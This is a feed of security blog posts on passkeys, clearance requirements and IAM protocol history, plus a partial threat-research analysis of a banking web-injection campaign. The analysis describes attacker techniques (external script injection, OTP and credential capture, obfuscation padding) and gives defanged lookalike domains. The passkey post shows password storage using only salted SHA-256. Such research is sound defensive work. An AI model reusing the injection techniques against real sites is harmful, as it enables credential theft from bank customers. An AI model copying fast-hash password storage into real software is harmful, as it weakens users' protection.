Identity & Access – Security Intelligence https://securityintelligence.com Analysis and Insight for Information Security Professionals Thu, 25 Apr 2024 20:34:11 +0000 en-US hourly 1 https://wordpress.org/?v=6.6.1 https://securityintelligence.com/wp-content/uploads/2016/04/SI_primary_rgb-80x80.png Identity & Access – Security Intelligence https://securityintelligence.com 32 32 Passwords, passkeys and familiarity bias https://securityintelligence.com/posts/passwords-passkeys-familiarity-bias/ Tue, 23 Apr 2024 13:00:00 +0000 https://securityintelligence.com/?p=447442 As passkey (passwordless authentication) adoption proceeds, misconceptions abound. There appears to be a widespread impression that passkeys may be more convenient and less secure than passwords. The reality is that they are both more secure and more convenient — possibly a first in cybersecurity. Most of us could be forgiven for not realizing passwordless authentication […]

The post Passwords, passkeys and familiarity bias appeared first on Security Intelligence.

]]>

As passkey (passwordless authentication) adoption proceeds, misconceptions abound. There appears to be a widespread impression that passkeys may be more convenient and less secure than passwords. The reality is that they are both more secure and more convenient — possibly a first in cybersecurity.

Most of us could be forgiven for not realizing passwordless authentication is more secure than passwords. Thinking back to the first couple of use cases I was exposed to — a phone operating system (OS) and a banking app — there was an implied emphasis on convenience rather than security.

Until very recently, hardly any of the services I’ve used communicated its benefits in terms of greater security. Plenty of services compel customers to reauthenticate with their password periodically to allow for continued logins using biometrics. This completely misses the point.

A vague sense of passkeys’ convenience being more relevant than their security is one thing. An impression that they’re actually less secure is another.

This recent LinkedIn poll by Auth0 compelled me, in part, to write this piece.

The fact that the extra security benefits come only third in the poll is striking. My colleague Jeff Crume has recorded two excellent videos on the topic here and here.

I’m taking a slightly different tack. Before allaying concerns with the new thing, I intend to flip the question around.

Why do we unduly (or even blindly) trust the security status quo?

Many IT leaders and engineers remember the earlier days of cloud adoption when cagey executives placed more burden of proof on big cloud providers for security and resiliency than they did on their own server cabinets housed in leaky janitors’ closets.

Putting the spotlight on the implication that the incumbent thing is automatically good has always been a favorite exercise of mine.

The fields of cognitive psychology and behavioral economics conduct studies of some relevant interrelated and overlapping phenomena here. The godfathers of these fields, Daniel Kahneman and Amos Tversky, postulated the availability heuristic, whereby the most easily recallable things are erroneously judged to be the most true.

A closely derived spin-off of this heuristic is the familiarity heuristic. Subjects were shown fewer but more famous female names than the more numerous but non-celebrity male names. The familiarity of the female celebrity names caused them to believe that they were more frequent in the deck.

But the phenomenon that best fits our considerations here is Robert Zajonc’s mere-exposure effect. As fascinating as it is scary, his body of work describes robust evidence that liking/disliking is what really drives our decisions, with cognition playing a startlingly minor role the majority of the time. This effect, in turn, can be hacked simply by repeated exposure to a stimulus.

More insidiously, Zajonc demonstrated that low-level, less noticeable stimuli can get under our radars and cause us to like something via feelings of familiarity without our being conscious of it. More recent scholars of the lineage appear to support the assertion that usually, very little cognition is involved in forming attachments or aversions, with familiarity and repetition being the greatest contributors to them.

In light of this, it’s easy to see what fuels the dynamic whereby a lie told often enough becomes truth. This tendency can cause us to put misplaced trust in the commonplace as a false corollary to our suspicion of the novel.

Nassim Taleb rightly points out in his discussion of the Lindy effect that the tried, the tested and the longstanding are usually those very things for good reason, but that shouldn’t blind us to their weaknesses.

As a result of all these factors, people would likely be reluctant about passkeys even if services communicated their enhanced security benefits. To that end, let’s compare how passwords and passkeys work and examine which ones are more secure.

How passwords work

First, let’s take a quick look at password creation, storage and authentication.

When a user creates an account and defines a password, the password is fed through a hashing algorithm like sha256. This allows the hash’s value to be used to verify passwords without the service provider ever storing the password or knowing what it is.

To illustrate, let’s take the passwords “MySecurePassword123” and “MysecurePassword123” (the difference being the s for “secure” in the latter is lowercase).

See how radically different their hash values are:

  • MySecurePassword123 -> 1a5b06de7c27f493f0b246de9ab71dc35fc2171c38dc4c2b54f37e065a85e6f5
  • MysecurePassword123 -> d3f05a7223df23f4295a7e3be9a6f64c1f9bf5b90068b8e4a1b5e0e0440bb594

Let’s continue with the example “MySecurePassword123.” To ensure that two users with the same password don’t end up with the same hash values, a string of random characters is generated and appended to the start first. This is known as “salting.” This random string of salting is added to the beginning of the password that the user defines.

Let’s step through the process:

  • Original Password: MySecurePassword123
  • Generate Salt: \x8e\xd7T\xe7\xd6\x84\xbb\x18\x1a\xed4sBp\x06
  • Combine with Password:
    • \x8e\xd7T\xe7\xd6\x84\xbb\x18\x1a\xed4sBp\x06MySecurePassword123
    • (or \x8e\xd7T\xe7\xd6\x84\xbb\x18\x1a\xed4sBp\x06 + MySecurePassword123)
  • Hashed combination Salt+Password:
    • 35f3b09d68e4c0059d06d2b259c21dd67c5b33a520ff2b1980ad5dcafc764de1

This final hashed combination, along with the salt value generated at registration time, is what finally gets stored:

  • Salt: \x8e\xd7T\xe7\xd6\x84\xbb\x18\x1a\xed4sBp\x06
  • Hashed combination Salt+Password:
    • 35f3b09d68e4c0059d06d2b259c21dd67c5b33a520ff2b1980ad5dcafc764de1

For each authentication, the saved string of salt is retrieved, added to the beginning of the password entered by the user, fed through the same hashing algorithm and checked against the hash value stored in the directory.

This means a user entering “MySecurePassword123” as their password will have the stored salt value added to the beginning every time and always end up with the same hashed combination value.

The main drawback is that users still need to transmit their passwords over the internet every single time. Not only that, they can be hacked or cracked by brute force, credential stuffing or dictionary attacks.

Now, let’s compare this with passkeys.

How passkeys work

To put the most important information first, passkey authentication is based on a protocol called Fast Identity Online 2 (FIDO2). Its headline security benefit is that it negates the need to transmit credentials over the internet by sending pieces of cryptography instead. Also, because of its use of private and public keys, it leaves hardly anything to hack or crack, as we’ll see.

Let’s take a look at the typical process whereby a user enrolls their device for biometric authentication with Google by creating a passkey and then authenticating with it.

 

  1. The user registers a fingerprint, face or PIN with a FIDO-enabled device’s OS for use during local authentication later. A hash of this biometric or PIN credential data is stored in a secure, partitioned hardware component on the device known as a Secure Element or Trusted Execution Environment.

  2. As part of creating a passkey for Google login, the FIDO-enabled device generates a private and public key pair conceptually similar to the ones used in HTTPS communications. The public key is sent to the service with which the passkey is being registered. The private key is kept in the same secure hardware cordon with the biometric credential hash.

  3. The next time Google receives a login request from this username, it sends a challenge to the FIDO-enabled device.

  4. The FIDO-enabled device authenticates the user locally by scanning their face or fingerprint.

  5. If the biometric matches, the FIDO-enabled device sends a digital signature generated with the private key created when registering with Google in Step 2. Google can authenticate this challenge-response if the signature verifies with the public key because only the holder of that private key could have generated that signature.

FIDO uses a combination of biometric analysis and cryptography paradigms long in operation in securing network communications to achieve increased security and increased convenience. All that’s ever getting transmitted over the internet are public keys, challenges and digital signatures — pieces of cryptography that confirm authentication between devices and servers.

For a technical discussion of how FIDO protects against phishing, read this blog post by our veteran IAM engineer Shane Weeden.

Reach out to your local IBM identity technical specialist to find out just how doable it is to embed passkeys into your customer-facing websites and apps, or roll out within your enterprise!

The post Passwords, passkeys and familiarity bias appeared first on Security Intelligence.

]]>
Obtaining security clearance: Hurdles and requirements https://securityintelligence.com/articles/obtaining-security-clearance-hurdles-requirements/ Tue, 16 Apr 2024 13:00:00 +0000 https://securityintelligence.com/?p=447420 As security moves closer to the top of the operational priority list for private and public organizations, needing to obtain a security clearance for jobs is more commonplace. Security clearance is a prerequisite for a wide range of roles, especially those related to national security and defense. Obtaining that clearance, however, is far from simple. […]

The post Obtaining security clearance: Hurdles and requirements appeared first on Security Intelligence.

]]>

As security moves closer to the top of the operational priority list for private and public organizations, needing to obtain a security clearance for jobs is more commonplace. Security clearance is a prerequisite for a wide range of roles, especially those related to national security and defense.

Obtaining that clearance, however, is far from simple. The process often involves scrutinizing one’s background, financial history and even personal character. Let’s briefly explore some of the hurdles, expectations and requirements of obtaining a clearance.

Jobs that typically require security clearance

When you think of security clearance, government positions almost always come to mind. However, working in a cleared space is also a requirement for many roles within private organizations that contract with the government.

These positions are wide-ranging in industry and type and include:

  • Federal government and military jobs
  • Cybersecurity roles
  • Positions within intelligence agencies such as the CIA and FBI

Ultimately, any job requiring national security information access mandates a security clearance. Examples include executive-level positions to non-sensitive jobs like custodial staff, librarians and IT system administrators, depending on the level of classified information handled.

How long does it take to obtain clearance?

The time required to gain security clearance can vary significantly, often taking anywhere from a few months to over a year. The waiting period is determined by the depth of investigation required, which corresponds to the clearance level needed for the job.

While some applicants may receive interim security clearances to start their jobs sooner, final approval can be lengthy, especially if additional information is needed or there are backlogs in processing applications.

Potential hurdles in the clearance process

Obtaining security clearance isn’t supposed to be easy, and the process is designed to ensure that only the most trustworthy individuals have access to sensitive information.

Here are a few key challenges applicants might face:

Citizenship

A fundamental requirement for obtaining a security clearance is U.S. citizenship. Non-citizens are generally ineligible for clearance.

Financial history

An applicant’s financial history is a crucial part of the security clearance process. Issues like excessive debt, bankruptcy or a history of not meeting financial obligations can raise red flags about susceptibility to bribery or financial coercion.

Criminal record

A criminal record, depending on the nature and severity of the offenses, can be a significant barrier to obtaining a security clearance. Felonies, domestic violence convictions and other serious crimes can disqualify an applicant. Even minor offenses can be problematic if they indicate a pattern of risky behavior.

Drug use

Past drug use, even with marijuana, remains a contentious issue in the security clearance process. Despite the legalization of marijuana for medicinal or recreational use in many states, federal law still classifies it as an illegal substance. Agencies like the FBI require applicants to have abstained from marijuana use for at least three years before applying. The policy reflects concerns about judgment, reliability and the potential for blackmail. The evolving legal landscape around marijuana use presents a complex challenge for both applicants and agencies, especially as society shifts toward greater acceptance of cannabis.

Personal conduct and character

The security clearance process thoroughly examines an applicant’s personal conduct and character. Allegiance to foreign entities, misuse of technology or information and even sexual behavior are factors that could make one susceptible to blackmail and impact one’s general reliability.

Mental health

While mental health conditions do not automatically disqualify someone from obtaining a security clearance, how an individual manages their condition is essential. Untreated mental health issues that impact judgment and reliability or could lead to unpredictable behavior may raise concerns.

Working in a cleared space

Obtaining a security clearance is critical for individuals seeking employment in positions requiring access to classified information. While the process is comprehensive and can be daunting, understanding the expectations, requirements and potential hurdles can prepare applicants for what lies ahead. As societal attitudes and laws (particularly regarding drug use) continue to evolve, the criteria for security clearances may also adapt.

However, the core objective remains: ensuring individuals entrusted with national security information are thoroughly vetted and deemed reliable and trustworthy.

For those working in a cleared world, approaching the process with a healthy dose of patience, transparency and a thorough understanding will be incredibly helpful.

The post Obtaining security clearance: Hurdles and requirements appeared first on Security Intelligence.

]]>
From federation to fabric: IAM’s evolution https://securityintelligence.com/posts/identity-and-access-management-evolution/ Tue, 05 Mar 2024 14:00:00 +0000 https://securityintelligence.com/?p=447262 In the modern day, we’ve come to expect that our various applications can share our identity information with one another. Most of our core systems federate seamlessly and bi-directionally. This means that you can quite easily register and log in to a given service with the user account from another service or even invert that […]

The post From federation to fabric: IAM’s evolution appeared first on Security Intelligence.

]]>

In the modern day, we’ve come to expect that our various applications can share our identity information with one another. Most of our core systems federate seamlessly and bi-directionally. This means that you can quite easily register and log in to a given service with the user account from another service or even invert that process (technically possible, not always advisable). But what is the next step in our evolution towards greater interoperability between our applications, services and systems?

Identity and access management: A long evolution

Identity and access management (IAM) has evolved into a sprawling field of separate but interrelated processes. 

Even before the recent pandemic, both the users of our tech stacks and the servers that host their applications were becoming more and more dispersed and scattered. The pandemic only served to hyper-accelerate that trend. 

As Gartner’s Cybersecurity Chief of Research, Mary Ruddy stated recently, “Digital security is reliant on identity whether we want it to be or not. In a world where users can be anywhere and applications are increasingly distributed across datacenters in the multi-cloud… identity and access is the control plane.”

Add to this the fact that most cybersecurity functions score about 2.5 on Gartner’s five-point maturity scale and we see the usual tech dynamic of convenience forging ahead as security struggles to keep pace. 

To see how these patches of user databases and applications can be stitched together into a united whole and allow for risk and context-based access control across the board, we will explore how identity and access interoperability have evolved from federation standards and protocols until now and how this is evolving forward into a cohesive identity fabric. 

It’s time to learn from the past, evaluate the present and, of course, prepare for the future of IAM.

Past: A history of federation

Dropping into the timeline around the year 1995 lands us in a time when the green shoots of identity interoperability were just starting to show.  

Twelve years and several threads of directory (or user database) research and development culminated around this time, with the emergence of the Lightweight Directory Access Protocol (LDAP) – version 3. This standard became the basis for the Netscape Directory Server in 1996, OpenLDAP in 1998, and the now ubiquitous Microsoft Active Directory in 2000. 

The standard was initially optimized for read rather than write operations and was designed to allow client apps with very limited computing available (less than 16MB RAM and 100 MHz CPU) to query and authenticate users quickly. By achieving this low-overhead functionality, LDAP quickly became the de facto authentication protocol for internet services. 

Inside the integrated Microsoft (MS) estate, Active Directory authenticated credentials against an LDAP directory and granted access to the operating system (OS) and any applications to which a user was entitled. 

Outside the MS estate, single sign-on had to be achieved by reverse proxy servers that authenticated users (usually via LDAP) in a holding pen before redirecting them into the various systems to which they were entitled. Under the hood, this approach tended to combine LDAP, 302 HTTP redirects, and identity information injected into HTTP headers, with cookies used as session tokens. This Web Access Management (WAM) paradigm was effective but somewhat crude and varied greatly from app to app. 

Now that a relatively universal authentication protocol was established, the lack of a standardized way of landing users post-authentication into applications along with user, session or account attributes was in evidence. In addition to this, session tokens based on cookies were only viable intra-domain and not inter-domain. Authorization was even clunkier, with specific endpoints/URLs within applications needing to be HTTP redirected to the auth server, which, in turn, would check against LDAP attributes before allowing the user to see a page or take action. 

SAML 2.0: A circle of trust

By the mid-2000s, threads of research and development (R&D) were coming to fruition, with WS Federation,  Liberty Alliance’s ID-FF 1.1, and the Organization for the Advancement of Structured Information Services (OASIS) Security Assertion Markup Language (SAML) 1.1 being the standout candidates. The latter two, along with Shibolleth, converged and OASIS ratified SAML 2.0 in March 2005.

The concept was to create a circle of trust between a user, a directory, and an application. Administrators on both the application and directory sides could exchange signing certificates to create trust between their two systems.

In an identity-provider-initiated flow, directories can redirect authenticated users into an application from an application launchpad. However, in a service-provider-initiated flow, users can attempt to log in to applications and (typically) be recognized by their email domain and redirected to their home directory to be authenticated there before being redirected back to the app. 

In both cases, users land into an application with a SAML assertion, a piece of XML data that encapsulates their identity data, any other custom fields or attributes like account balance or shopping cart contents, and the x.509 signing certificate mentioned above. 

SAML authorization is most commonly performed by landing a user into an application with roles already defined on the application side, such as standard, manager, developer or administrator. This typically means a user’s allowed/disallowed pages or actions are tied to their role type. 

In SAML 2.0, we finally had an identity federation technology, a standardized way for users from one directory to access multiple applications and (best of all) across different network domains. 

In identity federation, one system plays the role of a directory or user database, and the other system plays the role of the application being accessed, even if both systems are commonly thought of as apps. 

Below are diagrams showing how two of the most widely used enterprise systems that support SAML could federate one way or the other. In one, Salesforce acts as the identity provider (directory or user database) for accessing Azure, and in the other scenario, the roles are reversed. The point is to illustrate how the federation uses combinations of LDAP and SAML to allow users to access a service with their accounts from another service.

Scenario 1

 

Key:

  1. The user chooses an option to sign in to Azure with their Salesforce account.
  2. Azure redirects the user to Salesforce for authentication.
  3. The user’s credentials are authenticated via LDAP against Salesforce’s directory.
  4. Salesforce sends a signed SAML assertion containing the user’s data to Azure to log them in.

Scenario 2

 

Key:

  1. The user chooses an option to sign in to Salesforce with their Azure account.
  2. Salesforce redirects the user to Azure for authentication.
  3. The user’s credentials are authenticated via LDAP against Azure’s directory.
  4. Azure sends a signed SAML assertion containing the user’s data to Salesforce to log them in.

The consumer computing revolution

Beyond the enterprise, the release of iOS in 2007 and Android in 2008 saw an explosion in consumer computing. 

Consider this statistic: in 2010, 37 percent of households owned a computer, but by 2014, 37 percent of individuals owned a smartphone. Across the two mobile OS in 2012 alone, roughly 1.3 billion new apps were shipped, with about 35 billion app downloads distributed across these new apps.

Client-side applications became extremely lightweight — mere viewing and input panes — with the vast majority of the logic, data, and computing residing on the server and injected in over the internet.

The number of application programming interfaces (APIs) mushroomed to cater to a population that increasingly demanded their apps and services be able to share their data with one another, particularly to allow for subscribing to a service with their accounts from another service.

R&D into a consumer computing open identity standard had been underway at Twitter and Google since about 2006 to 2007. During these conversations, experts realized that a similar need existed for an open standard for API access delegation. How could one application grant a certain amount of access to another without sharing credentials (which, in any case, would give total access)?

As Eran Hammer-Lahav explains in his guide to OAuth, “Many luxury cars today come with a valet key. It is a special key you give the parking attendant and, unlike your regular key, will not allow the car to drive more than a mile or two… Regardless of what restrictions the valet key imposes, the idea is very clever. You give someone limited access to your car with a special key while using your regular key to unlock everything.”

How does OAuth work?

OAuth was the framework that emerged to solve this problem. It allows users to share data without sharing passwords.

Let’s take a look at what happens on the backend when a photo printing service allows you to share your pictures from an online storage platform instead of requiring you to upload them from your local machine.

Below is an attempt to explain an OAuth authorization flow as simply as possible for a nine-step process. Formal terms for the various parties involved are bracketed. In this process, a user can share images from their Dropbox account with Photobox, an online photograph printing and delivery service. Like in the SAML relationships described earlier, admins from both platforms must establish a backend trust based on a client ID and client secret (instead of an x.509 certificate as in SAML) — this can be thought of as Photobox’s username and password with Dropbox. It describes a scenario where a third-party authorization service (often an IAM platform) is leveraged, but many websites or services may implement their own authorization service.

  1. A user opts to share data from one service (data holder) with another service (data requester). The data requester contacts the data holder with a client ID and client secret.
  2. Data-holding service redirects the request to an authorization service.
  3. The authorization service contacts the user’s browser to have them log in and/or provide consent to share data with the data requester as required. 
  4. The user logs in and/or provides consent to share data, often specifying what data can or cannot be shared (scopes).
  5. The authorizer redirects back to the data requester with an authorization token.
  6. The data requester contacts the authorizer on the backend (not via the user’s browser) with the authorization token plus client ID and client secret.
  7. The authorizer responds with an access token specifying the scope of what may or may not be accessed.
  8. The data requester sends an access token to the data holder.
  9. The data holder responds to the data requester with the scoped content.

SAML authorized users “in advance” by landing users into applications with a specified role, and those applications defined what different roles could or couldn’t do. OAuth allows for much more fine-grained authorization on a per-page or per-action basis. This reflects an expansion from role-based access to a more resource-based access control mentality that emphasizes the thing being accessed over who is doing the accessing.

Registration and authentication

But what about registering and authenticating users? Most people think of OpenID Connect (OIDC) as an extension of OAuth, which is optimized for authentication instead of authorization. OAuth itself, incidentally, appears less keen on this characterization:

“OAuth is not an OpenID extension and at the specification level, shares only a few things with OpenID — some common authors and the fact both are open specification in the realm of authentication and access control.”

While they are used for different purposes — OAuth to authorize, OIDC to authenticate — the fact is that an OIDC flow is an OAuth flow with the addition of identity tokens to the authorization and access tokens.

Let’s look at the flow behind the scenes in a scenario like the one below, where you can register or log in to Airbnb with your Apple ID.

 

  1. The user opts to log in to Airbnb with Apple ID.
  2. Airbnb sends a request to the Apple ID service containing Airbnb’s client ID and client secret configured by both platform admins. 
  3. The user authenticates against Apple ID’s directory.
  4. Apple ID sends an encoded identity JSON Web Token (JWT) to Airbnb that contains the user’s information. Airbnb can decode Apple’s identity token by using a public key. The user’s session is created.

Unlike the OAuth flow described earlier, the resource server/data holder and the authentication service are one and the same organization, with AppleID both holding the data and authorizing its sharing. Alternatively, a third-party IAM platform could be implemented to query an OpenID provider and authenticate against it.

The JSON Web Token

The emergence of the JSON Web Token (JWT) around 2013 was a crucial element in the evolution of identity federation and modern authentication. Essentially a JSON data format with added security features, it defined a secure and standardized format for signing, encrypting, decrypting, and transmitting identity data across domains.

JWTs consist of three parts:

  1. Header: Contains fields for type (which is JWT) and the cryptographic algorithm used in the signature in section three (often RSA or SHA256). If services have opted to encrypt as well as sign the JWT, the encryption algorithm will also be specified here.
  2. Payload: Contains the actual user information being transmitted in key: value pairs.
  3. Signature: This is where the content of the header and payload has the cryptographic algorithm specified in the header applied to ensure its integrity and authenticity. 


This is a sample JWT, encoded and decoded with a header specifying a JWT and the signing algorithm used, a payload specifying a unique ID, a name, and whether the user is an admin, and finally, a signature section.

It’s worth noting that while OAuth implementations may issue authorization and/or access tokens in XML, simple JSON, or JWT formats, OpenID Connect mandates the use of JWTs for identity tokens to ensure the authenticity and integrity of personally identifiable information.

This wraps up the main identity federation and access protocols and frameworks. It’s useful to think in terms of a user that wants to ‘come from’ some directory and ‘go to’ some application in most cases. The terms used in the different protocols vary but can be mapped reasonably well like this:

Generic

Security Assertion Markup Language (SAML)

OpenID Connect (OIDC)

OAuth

User

Principal/Subject

End-User

User

Directory / Identity Source / Registry 

Identity Provider (IdP)

OpenID Provider (OP)

Service Provider

Application

Service Provider (SP)

Relying Party (RP)

Consumer

Scroll to view full table

 

System for Cross-Domain Identity Management (SCIM)

Outside of access management, one more crucial IAM protocol is worth mentioning. The System for Cross-Domain Identity Management (SCIM) is the most common protocol for identity management. It is used to execute remote creation (provisioning), updating and deletion of users and groups from within an identity platform. It is also extremely useful for allowing developers to build out self-service user journeys such as address/phone/payment updating or password resets. Essentially a REST API optimized for identity governance, it has become a relatively universal standard, with most large cloud platforms now having SCIM endpoints that will accept HTTP POST and PUT requests.

Figure: Typical remote user-create SCIM API call

Present day: The state of identity and access management

The long march from LDAP to SAML, OAuth, OIDC and SCIM has seen profound evolution and interoperability in IAM. These protocols have done much to allow systems to lean on one another to authenticate users, authorize the sharing of resources, or agree on standardized ways to lift and shift user data.

As IBM’s Bob Kalka likes to say, “Identity and access is an amorphous blob that touches on everything.” There are several separate but related processes that IAM admins, engineers and architects must be concerned with. The tooling developed by vendors has grown up to service these processes. Let’s look at the main ones:

  1. Orchestrate user journeys across applications, directories, and third-party services (like identity proofers) from the user interface (UI) backward down the stack. The web redirect is still one of the most basic units of work, as users get bounced around between systems to execute user journeys that call on multiple systems. This usually demands that IAM engineers understand front-end web/mobile development and vice versa. 

  1. Consume identities from or sync and provision (CRUD — create, read, update, delete) identities into any number of identity sources of varying kinds.

  1. Control the provisioning, updating, and deletion of your joiners, movers, and leavers on the application side.

  1. Authenticate users into any number of target applications of varying kinds. Things are easier when applications have been built to modern federation specifications like SAML or OpenID Connect. These can then receive identity and account data from directories in a standardized way. However, many organizations do not have the resources to invest in modernizing the applications that do not support these modern protocols. Landing users into these applications securely while populating them with their identity or other account information as necessary (session creation) can be especially challenging.

  1. Perform adaptive or context-based access control across the estate. Access policies can be based on static conditional rules related to location, device, user/group attributes, or the pages or actions being accessed. Access management is increasingly leveraging machine-learning algorithms that profile usage patterns and increase their risk score when significant divergence from these patterns is detected. Once these ‘ifs’ are defined, admins can define ‘thens’ that might range from allow, multi-factor authentication (MFA), extra MFA, or block sessions, depending on the riskiness of the user’s session.

  1. Integrate IAM with the organization’s Security Operations (SecOps). Most cybersecurity organizations scored 50 percent on a recent Gartner five-point maturity scale for IAM. SecOps and IAM are indeed quite distinct specializations, but the low level of interoperability is surprising. At the very least, it should be taken for granted that your security information and event management (SIEM) is consuming IAM logs. This convergence of disciplines is dubbed identity threat detection and response (ITDR).

  1. Control access to privileged systems like server operating systems and root accounts of cloud service providers. These privileged access management (PAM) systems should, at a minimum, vault credentials to these systems. More advanced practices include approval requests, session recording, or credential heartbeats to detect whether credentials have been altered.

This is the point at which IAM stands today: a proliferation of tools, processes, and integrations. To add to that complexity, most organizations’ IAM terrains are fragmented, at least along workforce and consumer lines. There is just as often further fragmentation on a per-business unit, per-product offering, or per-budget basis.

Where can our efforts to further unify this control plane lead us?

Looking Ahead: The identity fabric

Gartner refers to an identity fabric as “a system of systems composed of a blend of modular IAM tools.”

As a discipline, IAM is at a point somewhat reminiscent of the world of SecOps circa 2016. At that time, there were several distinct but interrelated subdisciplines within the Security Operations Centre (SOC). Detection, investigation, and response were perhaps the three main process specializations, as well as product categories. Endpoint detection and response, threat intelligence, and threat hunting were and are swim lanes unto themselves. It was in this context that the need for orchestration processes and SOAR tooling emerged to stitch all of this together.

Given the security ramifications at stake, the evolution toward greater cohesion in IAM must be maintained. This more unified approach is what underpins the identity fabric mentality.

If it is a composable fabric of tools woven together, the orchestration layer is the stitching that weaves that fabric together. It is important to think of orchestration as both a work process and a tool. 

Therefore, an identity fabric constitutes any and all of the seven work processes an organization needs to carry out its use cases — plus an orchestration process. This is how the “centralized control and decentralized enablement” discussed by Gartner is achieved.

IBM tooling across the 7 IAM work processes

IBM’s mission within the IAM space is to allow organizations to connect any user to any resource.

We have, for some time, had the greatest breadth of IAM tools under one roof. We were also the first to offer a single platform that supported both runtime (access management) and administrative (identity governance) workloads in a single product. This product, Verify SaaS, also has the distinction of still being the only platform equally optimized for both workforce and consumer workloads. 

That we have tooling across all seven process categories is a unique differentiator. That we offer a single platform that straddles five of these seven processes is even more unique.

Examining the seven work processes, here is a brief holistic outline of the toolbox:

1. Orchestration

Our new orchestration engine is now available as part of Verify SaaS. It allows you to easily build user journey UIs and use cases in a low-code/no-code environment. On the back end, you can orchestrate directories and applications of all kinds and easily integrate with third-party fraud, risk or identity-proofing tools.

2. Directory integration and federation

IBM’s on-premise directory is the first on the market to support containerized deployments. Virtual Directory functionality allows the consumption of identities from heterogeneous identity sources to present target systems with a single authentication interface. Directory Integrator boasts an unrivaled number of connectors and parsers to read identity records from systems or databases and write them into other required directories. 

3. Identity governance

IBM offers powerful and customizable identity governance platforms in SaaS or software form, as well as out-of-the-box connectors for all the major enterprise applications, along with host adaptors for provisioning into infrastructure operating systems. Additional modules are available for entitlement discovery, separation of duty analysis, compliance reporting, and role mining and optimization.

4. Modern authentication

IBM offers runtime access management platforms available as SaaS or software. Both support SAML and OpenID Connect. The software platform’s heritage is in web access management, so the base module is a reverse proxy server for pre-federation target apps. 

The IBM Application Gateway (IAG) is a special gem in our IAM toolbox. A novel combination of old and new technologies, it allows you to serve a lightweight reverse proxy out of a container. Users are authenticated in via OIDC and out into the target application via reverse proxy. It can front an application that doesn’t support federation. It can also be used to enforce access policies within your custom application based on URL paths, hostnames and HTTP methods. Available at no extra cost with any Verify Access or Verify SaaS entitlement, it is now available as a standalone component. The Application Gateway allows you to modernize how your custom app is consumed without needing to invest in the modernization of the app itself. 

 

 

5. Adaptive access

Trusteer is IBM’s fraud detection solution. It ingests over 200 data criteria to risk score user behaviour, such as time, typing, mouse patterns, browser or OS information, and virtual machine (VM) detection. Available to deploy standalone within your front-end applications, Verify Access and Verify SaaS can also leverage Trusteer’s machine learning algorithm to risk score a user session at authentication time. 

6. Identity threat detection and response

In addition to the Verify products’ native threat detection capabilities, they can easily integrate with the IBM X-Force threat intelligence platform and other third-party risk services. This data can be leveraged to immediately reject common or compromised credentials or requests from known malicious IP addresses. 

7. Privileged access management

To round out the IAM toolbox, Verify Privilege provides credential vaulting and heartbeat, session launchers, and session recording for mission-critical infrastructure operating systems, databases and systems.

Embracing cohesive IAM solutions

In the spirit of composability, IBM offers virtually every kind of IAM tool you could need, along with the orchestration engine that can stitch your identity estate into a cohesive fabric. They are all designed to interoperate with other directories, applications, access managers, or identity governors you may currently have deployed. The unique proposition is that we can provide what is missing, whatever that may be.

Where identity and access have always tended to have been a layer of abstraction within applications or operating systems, the identity fabric paradigm is about decoupling identity and access from applications, directories, and operating systems. The aspiration is for identity to graduate to a layer that floats above systems rather than remain a layer that is embedded within them.

To leave aside tooling and technologies for the final word, implementing the available tooling that facilitates an identity fabric will not automatically make it a reality. Currently, a solution architect is almost as likely as not to believe each solution requires its own directory or access manager, much like most solutions must be underpinned by their own databases. In this context, is it any surprise that IAM processes are so siloed and fragmented?

Contact your in-country technical specialist to book a free identity fabric workshop and discuss how you can evolve your IAM environment into a cohesive security control plane.

Explore IBM IAM solutions

The post From federation to fabric: IAM’s evolution appeared first on Security Intelligence.

]]>
Web injections are back on the rise: 40+ banks affected by new malware campaign https://securityintelligence.com/posts/web-injections-back-on-rise-banks-affected-danabot-malware/ Tue, 19 Dec 2023 14:00:00 +0000 https://securityintelligence.com/?p=446808 Web injections, a favored technique employed by various banking trojans, have been a persistent threat in the realm of cyberattacks. These malicious injections enable cyber criminals to manipulate data exchanges between users and web browsers, potentially compromising sensitive information. In March 2023, security researchers at IBM Security Trusteer uncovered a new malware campaign using JavaScript […]

The post Web injections are back on the rise: 40+ banks affected by new malware campaign appeared first on Security Intelligence.

]]>

Web injections, a favored technique employed by various banking trojans, have been a persistent threat in the realm of cyberattacks. These malicious injections enable cyber criminals to manipulate data exchanges between users and web browsers, potentially compromising sensitive information.

In March 2023, security researchers at IBM Security Trusteer uncovered a new malware campaign using JavaScript web injections. This new campaign is widespread and particularly evasive, with historical indicators of compromise (IOCs) suggesting a possible connection to DanaBot — although we cannot definitively confirm its identity.

Since the beginning of 2023, we have seen over 50,000 infected user sessions where these injections were used by attackers, indicating the scale of threat activity, across more than 40 banks that were affected by this malware campaign across North America, South America,  Europe and Japan.

In this blog post, we will delve into an analysis of the web injection utilized in the recent campaign, its evasive techniques, code flow, targets and the methods employed to achieve them.

A dangerous new campaign

Our analysis indicates that in this new campaign, threat actors’ intention with the web injection module is likely to compromise popular banking applications and, once the malware is installed, intercept the users’ credentials in order to then access and likely monetize their banking information.

Our data shows that threat actors purchased malicious domains in December 2022 and began executing their campaigns shortly after. Since early 2023, we’ve seen multiple sessions communicating with those domains, which remain active as of this blog’s publication.

Upon examining the injection, we discovered that the JS script is targeting a specific page structure common across multiple banks. When the requested resource contains a certain keyword and a login button with a specific ID is present, new malicious content is injected.

Credential theft is executed by adding event listeners to this button, with an option to steal a one-time password (OTP) token with it.

This web injection doesn’t target banks with different login pages, but it does send data about the infected machine to the server and can easily be modified to target other banks.

Code delivery

In the past, we observed malware that directly injected the code into the compromised web page. However, in this campaign, the malicious script is an external resource hosted on the attacker’s server. It is retrieved by injecting a script tag into the head element of the page’s HTML document, with the src attribute set to the malicious domain.

HTML snippet:

During our investigation, we observed that the malware initiates data exfiltration upon the initial retrieval of the script. It appends information, such as the bot ID and different configuration flags, as query parameters. The computer’s name is usually used as the bot ID, which is information that isn’t available through the browser. It indicates that the infection has already occurred at the operating system level by other malware components, before injecting content into the browser session.

Figure 1: The initial obfuscated GET request fetching the script

Evasion techniques

The retrieved script is intentionally obfuscated and returned as a single line of code, which includes both the encoded script string and a small decoding script.

To conceal its malicious content, a large string is added at the beginning and end of the decoder code. The encoded string is then passed to a function builder within an anonymous function and promptly executed, which also initiates the execution of the malicious script.

Figure 2: Encoded string passed to de-obfuscation function, followed by removal of artifacts used for decoding the script. Two long strings were added to the beginning and end of the string to make it harder to find the code manually.

At first glance, the network traffic appears normal, and the domain resembles a legitimate content delivery network (CDN) for a JavaScript library. The malicious domains resemble two legitimate JavaScript CDNs:

Malicious

Legitimate

jscdnpack[.]com cdnjs[.]com
unpack[.]com unpkg[.]com
